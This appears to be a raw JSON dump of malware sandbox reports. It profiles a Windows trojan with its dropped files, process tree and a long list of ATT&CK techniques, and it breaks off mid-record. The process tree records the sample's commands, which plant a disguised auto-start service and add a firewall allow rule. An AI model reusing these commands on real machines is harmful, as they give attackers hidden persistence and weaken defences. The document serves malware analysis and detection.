"relevance": 1, "name": "Section contains high entropy", "description": "\"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465\" has section name .text with entropy \"6.628988088385633\"\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465\" has section name .rsrc with entropy \"7.8373337648606025\"\n \"7e2adc1e8273c9662cc51304835805cc31d1a65c5b151789b69e5441cb666465\" has section name .reloc with entropy \"6.5479966824442\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035
https://hybrid-analysis.com/sample/25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035
Hybrid Analysis - Um_unhooking
{"size": 11796200, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035", "sha256": "25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035", "av_detect": 88, "vx_family": "Trojan.BrsecmonE", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 4, "total_processes": 9, "total_signatures": 245, "extracted_files": [{"name": "qhdkbaei.exe", "file_path": "%TEMP%\\qhdkbaei.exe", "file_size": 5242368, "sha256": "66df8fae402cf79e4c9fabb756dda914f96d85de37f6c0381c615136c937593e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe (PID: 5876)", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}, {"name": "qhdkbaei.exe.67EE4A76.bin", "file_size": 14253568, "sha256": "a860444265f2b6fbf99db2caf56960949b2f0b5ac0545d7779cf0f757f10262f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}, {"name": "dism.log", "file_size": 279804, "sha256": "48e0a2a580f3180ebac9de1ef3946b2827b834284dfdb128ff42109f31c4f9c5", "type_tags": ["text"], "description": "Unicode text, UTF-8 (with BOM) text, with very long lines (312), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "DISMHOST.EXE.67EE4FD0.bin", "file_size": 82944, "sha256": "ecb636b278261eade712e68ec7d805d20e802628248da872d3d0ada1432ffc11", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24215)", "1 Unknown Objects (build: 24215)", "1 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24215)"], "imported_objects": ["5 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "17 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "30 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "18 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24123)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a small codebase (1 files)"], "total_file_compositions_imports": 91}, "processes": [{"uid": "00000000-00005876", "name": "25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe", "normalized_path": "C:\\25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe", "sha256": "25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035"}, {"uid": "00000000-00005848", "parentuid": "00000000-00005876", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C mkdir %WINDIR%\\system32\\njrbicei\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00006124", "parentuid": "00000000-00005876", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C move /Y \"%TEMP%\\qhdkbaei.exe\" %WINDIR%\\system32\\njrbicei\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00004152", "parentuid": "00000000-00005876", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "create njrbicei binPath= \"%WINDIR%\\system32\\njrbicei\\qhdkbaei.exe /d\\\"C:\\25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\\\"\" type= own start= auto DisplayName= \"wifi support\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00006136", "parentuid": "00000000-00005876", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "description njrbicei \"wifi internet conection\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00004192", "parentuid": "00000000-00005876", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "start njrbicei", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00002232", "parentuid": "00000000-00005876", "name": "netsh.exe", "normalized_path": "%WINDIR%\\System32\\netsh.exe", "command_line": "advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\system32\\svchost.exe\" enable=yes>nul", "sha256": "661f5d4ce4f0a6cb32669a43ce5deec6d5a9e19b2387f22c5012405e92169943"}, {"uid": "00000000-00003436", "name": "qhdkbaei.exe", "normalized_path": "%WINDIR%\\system32\\njrbicei\\qhdkbaei.exe", "command_line": "/d\"C:\\25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\"", "sha256": "a860444265f2b6fbf99db2caf56960949b2f0b5ac0545d7779cf0f757f10262f"}, {"uid": "00000000-00002564", "parentuid": "00000000-00003436", "name": "svchost.exe", "normalized_path": "%WINDIR%\\system32\\svchost.exe", "sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Phishing", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566", "malicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 7, "informative_identifiers_count": 14}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 4, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Exploitation for Privilege Escalation", "attck_id": "T1068", "attck_id_wiki": "https://attack.mitre.org/techniques/T1068", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 4, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify System Firewall", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "NTFS File Attributes", "attck_id": "T1564.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "System Binary Proxy Execution", "attck_id": "T1218", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 5, "informative_identifiers_count": 20}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 3, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Account Discovery", "attck_id": "T1087", "attck_id_wiki": "https://attack.mitre.org/techniques/T1087", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": 